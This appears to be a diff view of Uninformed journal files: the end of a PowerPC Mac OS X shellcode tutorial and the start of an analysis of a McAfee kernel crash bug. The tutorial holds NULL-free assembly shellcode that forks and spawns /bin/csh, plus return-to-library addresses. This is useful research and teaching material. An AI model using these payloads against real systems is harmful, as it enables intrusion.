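    """'subi rD, rA, value' is 'addi rD, rA, -value'."""
    return addi(rd, ra, -value)


def has_null(word: int) -> bool:
    """True if any big-endian byte of the 32-bit word is 0x00."""
    return b"\x00" in struct.pack(">I", word)


INDEX = 0x3330
print(hex(li(0, 97)), has_null(li(0, 97)))        # direct load of 97
print(hex(li(7, INDEX)), has_null(li(7, INDEX)))  # index register load
for reg, target in ((0, 97), (3, 2), (4, 1), (5, 6)):
    word = subi(reg, 7, INDEX - target)
    print(hex(word), has_null(word))
```

Loading 97 directly assembles to 0x38000061, which carries two NULL bytes, while every instruction that goes through the index register in r7 is clean.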
|
||||
|
||||
|
||||
3.3) Branching
|
||||
|
||||
Branching to a forward address without using NULL bytes can be tricky on
|
||||
PowerPC systems. If you try branching forward, but less than 256 bytes, your
|
||||
opcode will contain a NULL. If you obtain your current address and want to
|
||||
branch to an offset from it, you will need to place the target address into the
|
||||
count register (ctr) or the link register (lr). If you decide to use the link
|
||||
register, you will notice that every valid form of "blr" has a NULL byte. You
|
||||
can avoid the NULL byte by setting the branch hint bits (19-20) to "11"
|
||||
(unpredictable branch, do not optimize). The resulting opcode becomes
|
||||
0x4e804820 instead of 0x4e800020 for the standard "blr" instruction.
|
||||
|
||||
The branch prediction bit (bit 10) can also come in handy; it is useful if you
|
||||
need to change the second byte of the branch instruction to a different
|
||||
character. The prediction bit tells the processor how likely it is that the
|
||||
instruction will result in a branch. To specify the branch prediction bit in
|
||||
the assembly source, just place '-' or '+' after the branch instruction.
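To see why short forward branches are a problem, it helps to encode a conditional branch by hand. The Python sketch below encodes the B-form 'bc' instruction (primary opcode 16). It assumes BO=4 and BI=2, the usual encoding of 'bne' on cr0; the helper names are hypothetical, and setting the low bit of BO is used here as a stand-in for the prediction bit described above.

```python
import struct


def bc(bo: int, bi: int, offset: int, link: bool = False) -> int:
    """Encode a relative 'bc BO, BI, target' (B-form, primary opcode 16)."""
    if offset % 4 or not -0x8000 <= offset <= 0x7FFC:
        raise ValueError("offset must be word aligned and fit in 16 bits")
    return (16 << 26) | (bo << 21) | (bi << 16) | (offset & 0xFFFC) | int(link)


def has_null(word: int) -> bool:
    """True if any big-endian byte of the 32-bit word is 0x00."""
    return b"\x00" in struct.pack(">I", word)


BNE_BO, CR0_EQ = 4, 2  # assumed 'bne' on cr0: branch if the EQ bit is clear

forward = bc(BNE_BO, CR0_EQ, 8)                    # bne  +8
backward = bc(BNE_BO, CR0_EQ, -4, link=True)       # bnel -4
predicted = bc(BNE_BO | 1, CR0_EQ, -4, link=True)  # same, prediction bit set

for word in (forward, backward, predicted):
    print(hex(word), has_null(word))
```

A small positive displacement leaves the upper byte of the 16-bit displacement field at zero, while a negative displacement sign-extends to 0xFF bytes. This is why the listings in this document branch backward with the link bit set and then read the link register. Setting the prediction bit changes the second byte from 0x82 to 0xa2.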
|
||||
|
||||
|
||||
4) Mac OS X Tricks
|
||||
|
||||
This section describes a handful of tips and tricks for writing shellcode on
|
||||
the Mac OS X platform.
|
||||
|
||||
|
||||
4.1) Diagnostic Tools
|
||||
|
||||
Mac OS X includes a solid collection of development and diagnostic tools, many
|
||||
of which are invaluable for shellcode and exploit development. The list below
|
||||
describes some of the most commonly used tools and how they relate to shellcode
|
||||
development.
|
||||
|
||||
Xcode: This package includes 'gdb', 'gcc', and 'as'. Sadly, objdump is not
|
||||
included and most disassembly needs to be done with 'gdb' or 'otool'.
|
||||
ktrace: The ktrace and kdump tools are equivalent to strace on Linux and truss
|
||||
on Solaris. There is no better tool for quickly diagnosing shellcode
|
||||
bugs.
|
||||
vmmap: If you were looking for the equivalent of /proc/pid/maps, you found it.
|
||||
Use vmmap to figure out where the heap, library, and stacks are mapped.
|
||||
crashreporterd: This daemon runs by default and creates very nice crash dumps
|
||||
when a system service dies. Invaluable for finding 0-day in Mac OS X
|
||||
services. The crashdump logs can be found in /Library/Logs/CrashReporter.
|
||||
heap: Quickly list all heaps in a process. This can be handy when the
|
||||
instruction cache prevents a direct return and you need to find an
|
||||
alternate shellcode location.
|
||||
otool: List all libraries linked to a given binary, disassemble mach-o
|
||||
binaries, and display the contents of any section of an executable or
|
||||
library. This is the equivalent of 'ldd' and 'objdump' rolled into a
|
||||
single utility.
|
||||
|
||||
|
||||
4.2) System Call Failure
|
||||
|
||||
An interesting feature of Mac OS X is that a successful system call will return
|
||||
to the address 4 bytes after the end of the 'sc' instruction and a failed system
|
||||
call will return directly after the 'sc' instruction. This allows you to
|
||||
execute a specific instruction only when the system call fails. The most common
|
||||
application of this feature is to branch to an error handler, although it can
|
||||
also be used to set a flag or a return value. When writing shellcode, this
|
||||
feature is usually more annoying than anything else, since it boosts the size
|
||||
of your code by four bytes per system call. In some cases though, this feature
|
||||
can be used to shave an instruction or two off the final payload.
|
||||
|
||||
|
||||
4.3) Threads and Execve
|
||||
|
||||
Mac OS X has an undocumented behavior concerning the execve() system call
|
||||
inside a threaded process. If a process tries to call execve() and has more
|
||||
than one active thread, the kernel returns the error EOPNOTSUPP. After a closer
|
||||
look at kern_exec.c in the Darwin XNU source code, it becomes apparent that for
|
||||
shellcode to function properly inside a threaded process, it will need to call
|
||||
either fork() or vfork() before calling execve().
|
||||
|
||||
;;
|
||||
;; Fork and execute a command shell
|
||||
;;
|
||||
main:
|
||||
_fork:
|
||||
li r0, 2
|
||||
sc
|
||||
b _exitproc
|
||||
|
||||
_execsh: ; based on ghandi's execve
|
||||
xor. r5, r5, r5
|
||||
bnel _execsh
|
||||
mflr r3
|
||||
addi r3, r3, 32 ; r3 = address of _path (32 bytes past the mflr)
|
||||
stw r3, -8(r1) ; argv[0] = path
|
||||
stw r5, -4(r1) ; argv[1] = NULL
|
||||
subi r4, r1, 8 ; r4 = {path, 0}
|
||||
li r0, 59
|
||||
sc ; execve(path, argv, NULL)
|
||||
b _exitproc
|
||||
|
||||
_path:
|
||||
.ascii "/bin/csh" ; csh handles seteuid() for us
|
||||
.long 0
|
||||
|
||||
_exitproc:
|
||||
li r0, 1
|
||||
li r3, 0
|
||||
sc
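For readers who want to see the same fork-before-execve ordering outside of assembly, here is a user-space analogue in Python. It is not shellcode and does not reproduce the EOPNOTSUPP behavior; it only shows the call order on a POSIX system. The function name fork_and_exec and the /bin/sh test command are assumptions made for this sketch.

```python
import os


def fork_and_exec(path, argv):
    """Fork, exec path in the child, and return the child's exit status.

    Returns None if the child did not exit normally.
    """
    pid = os.fork()
    if pid == 0:
        # Child: only one thread exists here, so execve() is allowed.
        try:
            os.execv(path, argv)
        finally:
            # Only reached when execv() failed.
            os._exit(127)
    # Parent: wait for the child and report how it ended.
    _, status = os.waitpid(pid, 0)
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else None


if __name__ == "__main__":
    print(fork_and_exec("/bin/sh", ["sh", "-c", "exit 7"]))
```

The child created by fork() contains only the calling thread, which is why the execve() that follows it is no longer rejected in a threaded process.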
|
||||
|
||||
4.4) Shared Libraries
|
||||
|
||||
The Mac OS X user community tends to have one thing in common -- they keep
|
||||
their systems up to date. The Apple Software Update service, once enabled, is
|
||||
very insistent about installing new software releases as they become available.
|
||||
The result is that nearly every single Mac OS X system has the exact same
|
||||
binaries. System libraries are often loaded at the exact same virtual address
|
||||
across all applications. In this sense, Mac OS X is starting to resemble the
|
||||
Windows platform.
|
||||
|
||||
If all processes on all Mac OS X systems have the same virtual addresses for the
|
||||
same libraries, Windows-style shellcode starts to become possible. Assuming you
|
||||
can find the right argument-setting code in a shared library, return-to-library
|
||||
payloads also become much more feasible. These libraries can be used as return
|
||||
addresses, similar to how Windows exploits often return back to a loaded DLL.
|
||||
Some useful addresses are listed below:
|
||||
|
||||
|
||||
0x90000000: The base address of the system library (libSystem.B.dylib). Most
|
||||
of the function locations are static across all versions of OS X.
|
||||
0xffff8000: The base address of the "common" page. A number of useful
|
||||
functions and instructions can be found here. These functions
|
||||
include memcpy, sys_dcache_flush, sys_icache_invalidate, and bcopy.
|
||||
|
||||
|
||||
The following NULL-free example uses the sys_icache_invalidate function to flush
|
||||
1040 bytes from the instruction cache, starting at the address of the payload:
|
||||
|
||||
;;
|
||||
;; Flush the instruction cache in 32 bytes
|
||||
;;
|
||||
main:
|
||||
_main:
|
||||
xor. r5, r5, r5
|
||||
bnel main
|
||||
mflr r3
|
||||
|
||||
;; flush 1040 bytes starting after the branch
|
||||
li r4, 1024+16
|
||||
|
||||
;; 0xffff8520 is __sys_icache_invalidate()
|
||||
addis r8, r5, hi16(0xffff8520)
|
||||
ori r8, r8, lo16(0xffff8520)
|
||||
mtctr r8
|
||||
bctrl
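The address load in this example can be checked the same way as the earlier opcodes. The Python sketch below encodes the 'addis' and 'ori' pair, models the value they leave in r8 (assuming r5 is zero, as the 'xor.' guarantees), and shows why the length is written as 1024+16. All helper names are hypothetical.

```python
import struct


def hi16(value: int) -> int:
    return (value >> 16) & 0xFFFF


def lo16(value: int) -> int:
    return value & 0xFFFF


def addis(rd: int, ra: int, imm16: int) -> int:
    """Encode 'addis rD, rA, imm' (D-form, primary opcode 15)."""
    return (15 << 26) | (rd << 21) | (ra << 16) | (imm16 & 0xFFFF)


def ori(ra: int, rs: int, imm16: int) -> int:
    """Encode 'ori rA, rS, imm' (D-form, primary opcode 24)."""
    return (24 << 26) | (rs << 21) | (ra << 16) | (imm16 & 0xFFFF)


def li(rd: int, simm: int) -> int:
    """Encode 'li rD, simm', that is 'addi rD, 0, simm'."""
    return (14 << 26) | (rd << 21) | (simm & 0xFFFF)


def has_null(word: int) -> bool:
    return b"\x00" in struct.pack(">I", word)


def load_result(base: int, target: int) -> int:
    """32-bit value left in the register after addis + ori."""
    return ((base + (hi16(target) << 16)) & 0xFFFFFFFF) | lo16(target)


TARGET = 0xFFFF8520
print(hex(addis(8, 5, hi16(TARGET))), hex(ori(8, 8, lo16(TARGET))))
print(hex(load_result(0, TARGET)))
print(hex(li(4, 1024)), has_null(li(4, 1024)))
print(hex(li(4, 1024 + 16)), has_null(li(4, 1024 + 16)))
```

A length of exactly 1024 would assemble to 0x38800400, which ends in a NULL byte; adding 16 moves the low byte to 0x10 and keeps the instruction clean.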
|
||||
|
||||
|
||||
5) Conclusion
|
||||
|
||||
In the first section, we covered the fundamentals of the PowerPC platform and
|
||||
described the syscall calling convention used on the Darwin/Mac OS X platform.
|
||||
The second section introduced a few techniques for removing NULL bytes from
|
||||
some common instructions. In the third section, we presented some of the tools
|
||||
and techniques that can be useful for shellcode development.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
B-r00t PowerPC / OSX (Darwin) Shellcode Assembly.
|
||||
http://packetstormsecurity.org/shellcode/PPC_OSX_Shellcode_Assembly.pdf
|
||||
|
||||
|
||||
Bunda, Potter, Shadowen PowerPC Microprocessor Developer's Guide.
|
||||
http://www.amazon.com/exec/obidos/tg/detail/-/0672305437/
|
||||
|
||||
Steve Heath Newnes Power PC Programming Pocket Book.
|
||||
http://www.amazon.com/exec/obidos/tg/detail/-/0750621117/
|
||||
|
||||
|
||||
IBM PowerPC Assembler Language Reference.
|
||||
http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/mastertoc.htm
|
567
uninformed/1.7.txt
Normal file
|
@ -0,0 +1,567 @@
|
|||
What Were They Thinking?
|
||||
Annoyances Caused by Unsafe Assumptions
|
||||
skape
|
||||
mmiller@hick.org
|
||||
Last modified: 04/04/2005
|
||||
|
||||
|
||||
1) Introduction
|
||||
|
||||
There is perhaps no issue more dear to a developer's heart than the
|
||||
issue of interoperability with third-party applications. In some
|
||||
cases, software that is being written by one developer has to be
|
||||
altered in order to make it function properly when used in
|
||||
conjunction with another application that is created by a
|
||||
third party. For the sake of illustration, the lone developer will
|
||||
henceforth be referred to as the protagonist given his or her
|
||||
valiant efforts in their quest to obtain that which is almost always
|
||||
unattainable: interoperability. The third-parties, on the other
|
||||
hand, will be referred to as the antagonists due to their wretched
|
||||
attempts to prevent the protagonist from obtaining his or her goal
|
||||
of a utopian software environment. Now, granted, that's not to say
|
||||
that the protagonist can't also become the antagonist by continuing
|
||||
the ugly cycle of exposing compatibility issues to other would-be
|
||||
protagonists, but for the sake of discussion such a point is not
|
||||
relevant.
|
||||
|
||||
What is relevant, however, are the ways in which an antagonistic
|
||||
developer can write software that will force other developers to
|
||||
work around issues exposed by the software that the antagonist has
|
||||
written. There are far too many specific issues to list, but the
|
||||
majority of these issues can be generalized into one category that
|
||||
will serve as the focus for this document. To put it simply, many
|
||||
developers make assumptions about the state of the machine that
|
||||
their software will be executing on. For instance, some software
|
||||
will assume that it is the only piece of software performing a
|
||||
given task on a machine. In the event that another piece of software
|
||||
attempts to perform a similar task, such as may occur when two
|
||||
applications need to extend APIs by hooking them, the results may be
|
||||
unpredictable. Perhaps a more concrete example of where assumptions
|
||||
can lead to problems can be seen when developers assume that the
|
||||
behavior of undocumented or unexposed APIs will not change.
|
||||
|
||||
Before putting all of the blame on the antagonists, however, it is
|
||||
important to understand that it is, in most cases, necessary to make
|
||||
assumptions about the way in which undocumented code performs, such
|
||||
as when dealing with low-level software. This is especially true
|
||||
when dealing with closed-source APIs, such as those provided by
|
||||
Microsoft. To that point, Microsoft has made an effort to document
|
||||
the ways in which every exposed API routine can perform, thereby
|
||||
reducing the number of compatibility issues that a developer might
|
||||
experience if they were to assume that a given routine would always
|
||||
perform in the same manner. Furthermore, Microsoft is renowned for
|
||||
attempting to always provide backwards compatibility. If a
|
||||
Microsoft application performs one way in a given release, chances
|
||||
are that it will continue to perform in the same fashion in
|
||||
subsequent releases. Third-party vendors, on the other hand, tend to
|
||||
have a more egocentric view of the way in which their software
|
||||
should work. This leads most vendors to dodge responsibility by
|
||||
pointing the blame at the application that is attempting to perform
|
||||
a certain task rather than making their code more robust.
|
||||
|
||||
In the interest of helping to make code more robust, this document
|
||||
will provide two examples of widely used software that make
|
||||
assumptions about the way in which code will execute on a given
|
||||
machine. The assumptions these applications make are always safe
|
||||
under normal conditions. However, if a new application that
|
||||
performs a certain task or an undocumented change is thrown into the
|
||||
mix, the applications find themselves faltering in the most
|
||||
unenjoyable ways. The two applications that will be analyzed are
|
||||
listed below:
|
||||
|
||||
- McAfee VirusScan Consumer (8.0/9.0)
|
||||
- ATI Radeon 9000 Driver Series
|
||||
|
||||
Each of the assumptions that these two software products make will
|
||||
be analyzed in-depth to describe why it is that they are poor
|
||||
assumptions to make, such as by describing or illustrating
|
||||
conditions where the assumptions are, or could be, false. From
|
||||
there, suggestions will be made on how these assumptions might be
|
||||
worked around or fixed to allow for a more stable product in
|
||||
general. In the end, the reader should have a clear understanding of
|
||||
the assumptions described in this document. If successful, the
|
||||
author hopes the topic will allow the reader to think critically
|
||||
about the various assumptions the reader might make when
|
||||
implementing software.
|
||||
|
||||
|
||||
2) McAfee VirusScan Consumer (8.0/9.0)
|
||||
|
||||
|
||||
2.1) The Assumption
|
||||
|
||||
McAfee VirusScan Consumer 8.0, 9.0, and possibly previous versions
|
||||
make assumptions about processes not performing certain types of
|
||||
file operations during a critical phase of process initialization.
|
||||
If file operations are performed during this phase, the machine may
|
||||
blue screen due to an invalid pointer access.
|
||||
|
||||
|
||||
2.2) The Problem
|
||||
|
||||
The critical phase of process execution that the summary refers to is the
|
||||
period between the time that the new process object instance is created by
|
||||
nt!ObCreateObject and the time the new process object is inserted into the
|
||||
process object type list by nt!ObInsertObject. The reason this phase is so
|
||||
critical is that it is not safe for other code to attempt to obtain a handle to
|
||||
the process object, such as can be done by calling nt!ObOpenObjectByPointer.
|
||||
If an application were to attempt to obtain a handle to the process object
|
||||
before it had been inserted into the process object list by nt!ObInsertObject,
|
||||
critical creation state information that is stored in the process object's
|
||||
header would be overwritten with state information that is meant to be used
|
||||
after the process has passed the initial security validation phase that is
|
||||
handled by nt!ObInsertObject. In some cases, overwriting the creation state
|
||||
information prior to calling nt!ObInsertObject can lead to invalid pointer
|
||||
references when nt!ObInsertObject is eventually called, thus leading to an evil
|
||||
blue screen that some users are all too familiar with.
|
||||
|
||||
To better understand this problem it is first necessary to understand the way
|
||||
in which nt!PspCreateProcess creates and initializes the process object and the
|
||||
process handle that is passed back to callers. The object creation portion is
|
||||
accomplished by making a call to nt!ObCreateObject in the following fashion:
|
||||
|
||||
ObCreateObject(
|
||||
KeGetPreviousMode(),
|
||||
PsProcessType,
|
||||
ObjectAttributes,
|
||||
KeGetPreviousMode(),
|
||||
0,
|
||||
0x258,
|
||||
0,
|
||||
0,
|
||||
&ProcessObject);
|
||||
|
||||
If the call is successful, a process object of the supplied size is created and
|
||||
initialized using the attributes supplied by the caller. In this case, the
|
||||
object is created using the nt!PsProcessType object type. The size argument
|
||||
that is supplied to nt!ObCreateObject, which in this case is 0x258, will vary
|
||||
between various versions of Windows as new fields are added and removed from
|
||||
the opaque EPROCESS structure. The process object's instance, as with all
|
||||
objects, is prefixed with an OBJECT_HEADER that may or may not also be prefixed
|
||||
with optional object information. For reference, the OBJECT_HEADER structure is
|
||||
defined as follows:
|
||||
|
||||
OBJECT_HEADER:
|
||||
+0x000 PointerCount : Int4B
|
||||
+0x004 HandleCount : Int4B
|
||||
+0x004 NextToFree : Ptr32 Void
|
||||
+0x008 Type : Ptr32 _OBJECT_TYPE
|
||||
+0x00c NameInfoOffset : UChar
|
||||
+0x00d HandleInfoOffset : UChar
|
||||
+0x00e QuotaInfoOffset : UChar
|
||||
+0x00f Flags : UChar
|
||||
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
|
||||
+0x010 QuotaBlockCharged : Ptr32 Void
|
||||
+0x014 SecurityDescriptor : Ptr32 Void
|
||||
+0x018 Body : _QUAD
|
||||
|
||||
When an object is first returned from nt!ObCreateObject, the Flags attribute
|
||||
will indicate if the ObjectCreateInfo attribute is pointing to valid data by
|
||||
having the OB_FLAG_CREATE_INFO, or 0x1 bit, set. If the flag is set then the
|
||||
ObjectCreateInfo attribute will point to an OBJECT_CREATE_INFORMATION structure
|
||||
which has the following definition:
|
||||
|
||||
OBJECT_CREATE_INFORMATION:
|
||||
+0x000 Attributes : Uint4B
|
||||
+0x004 RootDirectory : Ptr32 Void
|
||||
+0x008 ParseContext : Ptr32 Void
|
||||
+0x00c ProbeMode : Char
|
||||
+0x010 PagedPoolCharge : Uint4B
|
||||
+0x014 NonPagedPoolCharge : Uint4B
|
||||
+0x018 SecurityDescriptorCharge : Uint4B
|
||||
+0x01c SecurityDescriptor : Ptr32 Void
|
||||
+0x020 SecurityQos : Ptr32 _SECURITY_QUALITY_OF_SERVICE
|
||||
+0x024 SecurityQualityOfService : _SECURITY_QUALITY_OF_SERVICE
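The relationship between the Flags attribute and the union'd ObjectCreateInfo attribute can be modeled outside the kernel. The Python ctypes sketch below mirrors the OBJECT_HEADER layout listed above, with 32-bit pointers stored as plain integers. It is an illustration only: the layout is taken from the listing in this document and differs between Windows versions, and create_info_pointer is a hypothetical helper, not a kernel routine.

```python
import ctypes

OB_FLAG_CREATE_INFO = 0x01  # flag bit named in the text above


class _HandleUnion(ctypes.Union):
    _fields_ = [("HandleCount", ctypes.c_int32),
                ("NextToFree", ctypes.c_uint32)]


class _CreateInfoUnion(ctypes.Union):
    _fields_ = [("ObjectCreateInfo", ctypes.c_uint32),
                ("QuotaBlockCharged", ctypes.c_uint32)]


class OBJECT_HEADER(ctypes.Structure):
    _anonymous_ = ("u1", "u2")
    _fields_ = [
        ("PointerCount", ctypes.c_int32),        # +0x000
        ("u1", _HandleUnion),                    # +0x004
        ("Type", ctypes.c_uint32),               # +0x008
        ("NameInfoOffset", ctypes.c_uint8),      # +0x00c
        ("HandleInfoOffset", ctypes.c_uint8),    # +0x00d
        ("QuotaInfoOffset", ctypes.c_uint8),     # +0x00e
        ("Flags", ctypes.c_uint8),               # +0x00f
        ("u2", _CreateInfoUnion),                # +0x010
        ("SecurityDescriptor", ctypes.c_uint32), # +0x014
        ("Body", ctypes.c_uint64),               # +0x018
    ]


def create_info_pointer(header):
    """Return ObjectCreateInfo only while the flag says it is valid."""
    if header.Flags & OB_FLAG_CREATE_INFO:
        return header.ObjectCreateInfo
    return None


hdr = OBJECT_HEADER()
hdr.Flags = OB_FLAG_CREATE_INFO
hdr.ObjectCreateInfo = 0x1000
print(create_info_pointer(hdr))

hdr.Flags = 0
hdr.QuotaBlockCharged = 0x2000  # same four bytes as ObjectCreateInfo
print(create_info_pointer(hdr), hex(hdr.ObjectCreateInfo))
```

Once the flag is cleared, the same four bytes hold a quota block pointer, so any code that still reads them as creation information is looking at the wrong kind of object.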
|
||||
|
||||
When nt!ObInsertObject is finally called, it is assumed that the object still
|
||||
has the OB_FLAG_CREATE_INFO bit set. This will always be the case unless something
|
||||
has caused the bit to be cleared, as will be illustrated later in this chapter.
|
||||
The flow of execution within nt!ObInsertObject begins first by checking to see
|
||||
if the process' object header has any name information, which is conveyed by
|
||||
the NameInfoOffset of the OBJECT_HEADER. Regardless of whether or not the
|
||||
object has name information, the next step taken is to check to see if the
|
||||
object type that is associated with the object that is supplied to
|
||||
nt!ObInsertObject requires a security check to be performed. This requirement
|
||||
is conveyed through the TypeInfo attribute of the OBJECT_TYPE structure which is
|
||||
defined below:
|
||||
|
||||
OBJECT_TYPE:
|
||||
+0x000 Mutex : _ERESOURCE
|
||||
+0x038 TypeList : _LIST_ENTRY
|
||||
+0x040 Name : _UNICODE_STRING
|
||||
+0x048 DefaultObject : Ptr32 Void
|
||||
+0x04c Index : Uint4B
|
||||
+0x050 TotalNumberOfObjects : Uint4B
|
||||
+0x054 TotalNumberOfHandles : Uint4B
|
||||
+0x058 HighWaterNumberOfObjects : Uint4B
|
||||
+0x05c HighWaterNumberOfHandles : Uint4B
|
||||
+0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER
|
||||
+0x0ac Key : Uint4B
|
||||
+0x0b0 ObjectLocks : [4] _ERESOURCE
|
||||
|
||||
OBJECT_TYPE_INITIALIZER:
|
||||
+0x000 Length : Uint2B
|
||||
+0x002 UseDefaultObject : UChar
|
||||
+0x003 CaseInsensitive : UChar
|
||||
+0x004 InvalidAttributes : Uint4B
|
||||
+0x008 GenericMapping : _GENERIC_MAPPING
|
||||
+0x018 ValidAccessMask : Uint4B
|
||||
+0x01c SecurityRequired : UChar
|
||||
+0x01d MaintainHandleCount : UChar
|
||||
+0x01e MaintainTypeList : UChar
|
||||
+0x020 PoolType : _POOL_TYPE
|
||||
+0x024 DefaultPagedPoolCharge : Uint4B
|
||||
+0x028 DefaultNonPagedPoolCharge : Uint4B
|
||||
+0x02c DumpProcedure : Ptr32
|
||||
+0x030 OpenProcedure : Ptr32
|
||||
+0x034 CloseProcedure : Ptr32
|
||||
+0x038 DeleteProcedure : Ptr32
|
||||
+0x03c ParseProcedure : Ptr32
|
||||
+0x040 SecurityProcedure : Ptr32
|
||||
+0x044 QueryNameProcedure : Ptr32
|
||||
+0x048 OkayToCloseProcedure : Ptr32
|
||||
|
||||
The specific boolean field that is checked by nt!ObInsertObject is the
|
||||
TypeInfo.SecurityRequired flag. If the flag is set to TRUE, which it is for
|
||||
the nt!PsProcessType object type, then nt!ObInsertObject uses the access state
|
||||
that is passed in as the second argument or creates a temporary access state
|
||||
that it uses to validate the access mask that is supplied as the third argument
|
||||
to nt!ObInsertObject. Prior to validating the access state, however, the
|
||||
SecurityDescriptor attribute of the ACCESS_STATE structure is set to the
|
||||
SecurityDescriptor of the OBJECT_CREATE_INFORMATION structure. This is done
|
||||
without any checks to ensure that the OB_FLAG_CREATE_INFO flag is still set in the
|
||||
object's header, thus making it potentially dangerous if the flag has been
|
||||
cleared and the union'd attribute no longer points to creation information.
|
||||
|
||||
In order to validate the access mask, nt!ObInsertObject calls into
|
||||
nt!ObpValidateAccessMask with the initialized ACCESS_STATE as the only argument.
|
||||
This function first checks to see if the ACCESS_STATE's SecurityDescriptor
|
||||
attribute is set to NULL. If it's not, then the function checks to see if the
|
||||
SecurityDescriptor's Control attribute has a flag set. It is at this point
|
||||
that the problem is realized under conditions where the object's
|
||||
ObjectCreateInfo attribute no longer points to creation information. When such
|
||||
a condition occurs, the SecurityDescriptor attribute that is referenced
|
||||
relative to the ObjectCreateInfo attribute will potentially point to invalid
|
||||
memory. This can then lead to an access violation when attempting to reference
|
||||
the SecurityDescriptor that is passed as part of the ACCESS_STATE instance to
|
||||
nt!ObpValidateAccessMask. For reference, the ACCESS_STATE structure is defined
|
||||
below:
|
||||
|
||||
ACCESS_STATE:
|
||||
+0x000 OperationID : _LUID
|
||||
+0x008 SecurityEvaluated : UChar
|
||||
+0x009 GenerateAudit : UChar
|
||||
+0x00a GenerateOnClose : UChar
|
||||
+0x00b PrivilegesAllocated : UChar
|
||||
+0x00c Flags : Uint4B
|
||||
+0x010 RemainingDesiredAccess : Uint4B
|
||||
+0x014 PreviouslyGrantedAccess : Uint4B
|
||||
+0x018 OriginalDesiredAccess : Uint4B
|
||||
+0x01c SubjectSecurityContext : _SECURITY_SUBJECT_CONTEXT
|
||||
+0x02c SecurityDescriptor : Ptr32 Void
|
||||
+0x030 AuxData : Ptr32 Void
|
||||
+0x034 Privileges : __unnamed
|
||||
+0x060 AuditPrivileges : UChar
|
||||
+0x064 ObjectName : _UNICODE_STRING
|
||||
+0x06c ObjectTypeName : _UNICODE_STRING
|
||||
|
||||
Under normal conditions, nt!ObInsertObject is the first routine to create a
|
||||
handle to the newly created object instance. When the handle is created, the
|
||||
creation information that was initialized during the instantiation of the
|
||||
object is used for such things as validating access, as described above. Once
|
||||
the creation information is used it is discarded and replaced with other
|
||||
information that is specific to the type of the object being inserted. In the
|
||||
case of process objects, the Flags attribute has the OB_FLAG_CREATE_INFO bit
|
||||
cleared and the QuotaBlockCharged attribute, which is union'd with the
|
||||
ObjectCreateInfo attribute, is set to an instance of an EPROCESS_QUOTA_BLOCK
|
||||
which is defined below:
|
||||
|
||||
EPROCESS_QUOTA_ENTRY:
|
||||
+0x000 Usage : Uint4B
|
||||
+0x004 Limit : Uint4B
|
||||
+0x008 Peak : Uint4B
|
||||
+0x00c Return : Uint4B
|
||||
|
||||
EPROCESS_QUOTA_BLOCK:
|
||||
+0x000 QuotaEntry : [3] _EPROCESS_QUOTA_ENTRY
|
||||
+0x030 QuotaList : _LIST_ENTRY
|
||||
+0x038 ReferenceCount : Uint4B
|
||||
+0x03c ProcessCount : Uint4B
|
||||
|
||||
The assumptions made by nt!ObInsertObject work flawlessly so long as it is the
|
||||
first routine to create a handle to the object instance. Fortunately, under
|
||||
normal circumstances, nt!ObInsertObject is always the first routine to create a
|
||||
handle to the object. Unfortunately for McAfee, however, they assume that they
|
||||
can safely attempt to obtain a handle to a process object without first
|
||||
checking to see what state of execution the process is in, such as by checking
|
||||
to see if the OB_FLAG_CREATE_INFO flag is set in the object's header. By
|
||||
attempting to obtain a handle to the process object before it is inserted by
|
||||
nt!ObInsertObject, McAfee effectively destroys state that is needed by
|
||||
nt!ObInsertObject to succeed.
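The effect of reading a quota block as if it were creation information can be shown with the two layouts listed earlier. The Python ctypes sketch below is a toy model under stated assumptions: the structures follow the listings in this document (32-bit pointers stored as integers, the embedded SECURITY_QUALITY_OF_SERVICE reduced to 12 opaque bytes), the value written is arbitrary, and reinterpret_as_create_info is a hypothetical helper.

```python
import ctypes

u32 = ctypes.c_uint32


class OBJECT_CREATE_INFORMATION(ctypes.Structure):
    _fields_ = [
        ("Attributes", u32),                 # +0x000
        ("RootDirectory", u32),              # +0x004
        ("ParseContext", u32),               # +0x008
        ("ProbeMode", ctypes.c_int8),        # +0x00c, then 3 padding bytes
        ("PagedPoolCharge", u32),            # +0x010
        ("NonPagedPoolCharge", u32),         # +0x014
        ("SecurityDescriptorCharge", u32),   # +0x018
        ("SecurityDescriptor", u32),         # +0x01c
        ("SecurityQos", u32),                # +0x020
        ("SecurityQualityOfService", ctypes.c_uint8 * 12),  # +0x024
    ]


class EPROCESS_QUOTA_ENTRY(ctypes.Structure):
    _fields_ = [("Usage", u32), ("Limit", u32),
                ("Peak", u32), ("Return", u32)]


class EPROCESS_QUOTA_BLOCK(ctypes.Structure):
    _fields_ = [
        ("QuotaEntry", EPROCESS_QUOTA_ENTRY * 3),  # +0x000
        ("QuotaList", u32 * 2),                    # +0x030
        ("ReferenceCount", u32),                   # +0x038
        ("ProcessCount", u32),                     # +0x03c
    ]


def reinterpret_as_create_info(quota_block):
    """Read the quota block's bytes through the create-info layout."""
    return OBJECT_CREATE_INFORMATION.from_buffer_copy(bytes(quota_block))


quota = EPROCESS_QUOTA_BLOCK()
quota.QuotaEntry[1].Return = 0x12345678  # arbitrary accounting value
stale_view = reinterpret_as_create_info(quota)
print(hex(stale_view.SecurityDescriptor))
```

With these layouts, the SecurityDescriptor field at offset 0x1c lands on the Return field of the second quota entry, so a routine that trusts the stale pointer ends up treating an accounting value as an address.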
|
||||
|
||||
To show this problem being experienced in the real world, the following
|
||||
debugger output shows McAfee first attempting to obtain a handle to the process
|
||||
object which is then followed shortly thereafter by nt!ObInsertObject
|
||||
attempting to validate the object's access mask with a bogus SecurityDescriptor
|
||||
which, in turn, results in an unrecoverable access violation:
|
||||
|
||||
McAfee attempting to open a handle to the process object before
|
||||
nt!ObInsertObject has been called:
|
||||
|
||||
kd> k
|
||||
nt!ObpChargeQuotaForObject+0x2f
|
||||
nt!ObpIncrementHandleCount+0x70
|
||||
nt!ObpCreateHandle+0x17c
|
||||
nt!ObOpenObjectByPointer+0x97
|
||||
WARNING: Stack unwind information not available.
|
||||
NaiFiltr+0x2e45
|
||||
NaiFiltr+0x3bb2
|
||||
NaiFiltr+0x4217
|
||||
nt!ObpLookupObjectName+0x56a
|
||||
nt!ObOpenObjectByName+0xe9
|
||||
nt!IopCreateFile+0x407
|
||||
nt!IoCreateFile+0x36
|
||||
nt!NtOpenFile+0x25
|
||||
nt!KiSystemService+0xc4
|
||||
